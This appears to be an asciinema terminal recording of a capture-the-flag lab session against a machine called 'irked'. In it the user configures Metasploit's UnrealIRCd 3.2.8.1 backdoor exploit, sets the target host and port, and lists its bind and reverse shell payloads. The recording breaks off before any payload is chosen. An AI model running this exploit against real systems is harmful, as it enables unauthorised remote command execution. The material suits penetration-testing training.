[14.288013, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:36 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;19H"]
[14.597637, "o", "\b\u001b[K"]
[14.769634, "o", "\b\u001b[K"]
[14.959028, "o", "\b"]
[14.959179, "o", "\u001b[K"]
[15.118058, "o", "\b\u001b[K"]
[15.290885, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:37 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;15H"]
[15.45806, "o", "u"]
[15.535304, "o", "n"]
[15.718831, "o", "r"]
[15.877065, "o", "e"]
[15.909092, "o", "a"]
[16.013952, "o", "l"]
[16.290114, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:38 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;21H"]
[16.312166, "o", "i"]
[16.420794, "o", "r"]
[16.657816, "o", "\r\n"]
[16.853035, "o", "\u001b[1;82r\u001b[1;1H\u001b[3S\u001b[74dMatching Modules\r\n================\u001b[77;1H   #  Name                                        Disclosure Date  Rank       Check  Description\r\n   -  ----                                        ---------------  ----       -----  -----------\r\n   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       \u001b[32mexcellent\u001b[39m  No     \u001b[45mUnrealIR\u001b[49mCD 3.2.8.1 Backdoor Command Execution\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[16.85335, "o", "\u001b[1;82r\u001b[1;1H\u001b[2S\u001b[80dInteract with a module by name or index. For example \u001b[32minfo 0\u001b[39m, \u001b[32muse 0\u001b[39m or \u001b[32muse exploit/unix/irc/unreal_ircd_3281_backdoor\u001b[39m\r\n\u001b[K\r\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[16.918488, "o", "\u001b[4mmsf6\u001b(B\u001b[m > "]
[17.289934, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:39 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;8H"]
[17.834949, "o", "u"]
[17.8889, "o", "s"]
[17.957978, "o", "e"]
[18.101484, "o", " "]
[18.280621, "o", "0"]
[18.291687, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:40 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;13H"]
[19.128511, "o", "\u001b[1;82r\u001b[82;1H\n\u001b[K\u001b[1;83r\u001b[82;1H"]
[19.292169, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:41 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[82;1H"]
[19.562256, "o", "^L"]
[19.58499, "o", "\u001b[1;82r\u001b[1;1H\u001b[2;82r\u001b[81S\u001b[1;1H\u001b[K\u001b[1;83r\u001b[1;1H"]
[19.585788, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[20.261363, "o", "s"]
[20.294935, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:42 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;53H"]
[20.385587, "o", "h"]
[20.457747, "o", "o"]
[20.558066, "o", "w"]
[20.676947, "o", " "]
[20.78896, "o", "o"]
[20.861946, "o", "p"]
[20.966887, "o", "t"]
[21.089134, "o", "i"]
[21.097562, "o", "o"]
[21.192819, "o", "n"]
[21.288733, "o", "s"]
[21.2952, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:43 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;64H"]
[21.405507, "o", "\u001b[H"]
[21.406138, "o", "\r\n"]
[21.421259, "o", "\r\nModule options (exploit/unix/irc/unreal_ircd_3281_backdoor):\u001b[5;1H   Name    Current Setting  Required  Description\r\n   ----    ---------------  --------  -----------\r\n   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit\r\n   RPORT   6667             yes       The target port (TCP)\u001b[10;1H"]
[21.422184, "o", "\r\nExploit target:\u001b[13;1H   Id  Name\r\n   --  ----\r\n   0   Automatic Target\u001b[18;1H"]
[21.493154, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[21.873904, "o", "s"]
[21.994707, "o", "e"]
[22.200839, "o", "t"]
[22.277796, "o", " "]
[22.293806, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:44 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;56H"]
[22.574857, "o", "L"]
[22.792838, "o", "H"]
[22.880108, "o", "O"]
[22.933852, "o", "S"]
[23.02391, "o", "T"]
[23.294474, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:45 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;61H"]
[23.378838, "o", "\b\u001b[K"]
[23.890371, "o", "\b\u001b[K"]
[24.061784, "o", "\b"]
[24.061929, "o", "\u001b[K"]
[24.235923, "o", "\b"]
[24.236155, "o", "\u001b[K"]
[24.293117, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:46 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;57H"]
[24.413994, "o", "\b\u001b[K"]
[24.592146, "o", "R"]
[24.768938, "o", "H"]
[24.832283, "o", "O"]
[24.898824, "o", "S"]
[25.011614, "o", "T"]
[25.110945, "o", "S"]
[25.24862, "o", " "]
[25.293905, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:47 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;63H"]
[25.430069, "o", "1"]
[25.492191, "o", "0"]
[25.907917, "o", "."]
[26.026, "o", "1"]
[26.089885, "o", "0"]
[26.157022, "o", "."]
[26.294667, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:48 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;69H"]
[26.295343, "o", "1"]
[26.327053, "o", "0"]
[26.54499, "o", "0"]
[27.06028, "o", "\b\u001b[K"]
[27.162177, "o", "."]
[27.292392, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:49 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;72H"]
[27.31303, "o", "1"]
[27.505033, "o", "1"]
[27.620851, "o", "7"]
[28.292937, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:50 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[18;75H"]
[28.338013, "o", "\r\n"]
[28.347923, "o", "RHOSTS => 10.10.10.117\r\n"]
[28.422796, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[28.761215, "o", "s"]
[28.918776, "o", "e"]
[29.11588, "o", "t"]
[29.231217, "o", " "]
[29.292381, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:51 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;56H"]
[29.396422, "o", "R"]
[29.513977, "o", "H"]
[29.578537, "o", "O"]
[29.689748, "o", "S"]
[30.145952, "o", "\b"]
[30.146236, "o", "\u001b[K"]
[30.249154, "o", "R"]
[30.293981, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:52 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;60H"]
[30.945943, "o", "\b"]
[30.946132, "o", "\u001b[K"]
[31.271887, "o", "\b\u001b[K"]
[31.292689, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:53 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;58H"]
[31.419053, "o", "\b\u001b[K"]
[31.526315, "o", "R"]
[31.666692, "o", "P"]
[31.893665, "o", "O"]
[32.215901, "o", "\b\u001b[K"]
[32.293277, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:54 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;59H"]
[32.378148, "o", "\b\u001b[K"]
[32.540049, "o", "\b"]
[32.540478, "o", "\u001b[K"]
[32.69609, "o", "P"]
[32.885945, "o", "O"]
[32.984177, "o", "R"]
[33.179875, "o", "T"]
[33.29327, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:55 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;61H"]
[33.399241, "o", " "]
[34.2942, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:56 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;62H"]
[34.361775, "o", "1"]
[34.407058, "o", "0"]
[34.86588, "o", "\b\u001b[K"]
[35.023058, "o", "\b\u001b[K"]
[35.292374, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:57 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;62H"]
[35.397956, "o", "6"]
[35.598067, "o", "6"]
[35.707188, "o", "9"]
[35.842903, "o", "6"]
[36.10735, "o", "\b\u001b[K"]
[36.18854, "o", "7"]
[36.293397, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:58 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;66H"]
[37.293091, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:59 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;66H"]
[38.296589, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:00 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[20;66H"]
[38.345715, "o", "\r\n"]
[38.356352, "o", "RPORT => 6697\r\n"]
[38.435833, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[39.29871, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:01 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[22;52H"]
[40.298417, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:02 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[22;52H"]
[40.840202, "o", "s"]
[41.297264, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:03 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[22;53H"]
[41.425111, "o", "h"]
[41.87081, "o", "o"]
[41.966814, "o", "w"]
[42.043107, "o", " "]
[42.17371, "o", "p"]
[42.28983, "o", "a"]
[42.296173, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:04 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[22;59H"]
[42.411141, "o", "y"]
[42.621847, "o", "l"]
[42.805827, "o", "o"]
[42.945983, "o", "a"]
[43.045958, "o", "d"]
[43.230615, "o", "s"]
[43.29811, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:05 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[22;65H"]
[43.345789, "o", "\r\n"]
[43.50384, "o", "\r\nCompatible Payloads\r\n===================\u001b[27;1H   #   Name                                        Disclosure Date  Rank    Check  Description\r\n   -   ----                                        ---------------  ----    -----  -----------\r\n   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)\r\n   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6\r\n   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)\r\n   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6\r\n   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution\r\n   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)\r\n   6   payload/cmd/un"]
[43.503892, "o", "ix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)\r\n   7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)\r\n   8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)\r\n   9   payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)\r\n   10  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)\r\n   11  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)\u001b[42;1H"]
[43.569751, "o", "\u001b[4mmsf6\u001b(B\u001b[m exploit(\u001b[31m\u001b[1munix/irc/unreal_ircd_3281_backdoor\u001b(B\u001b[m) > "]
[44.297107, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:13:06 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[42;52H"]
[44.308012, "o", "u"]
[44.393906, "o", "s"]
[44.468245, "o", "e"]
[44.592567, "o", " "]
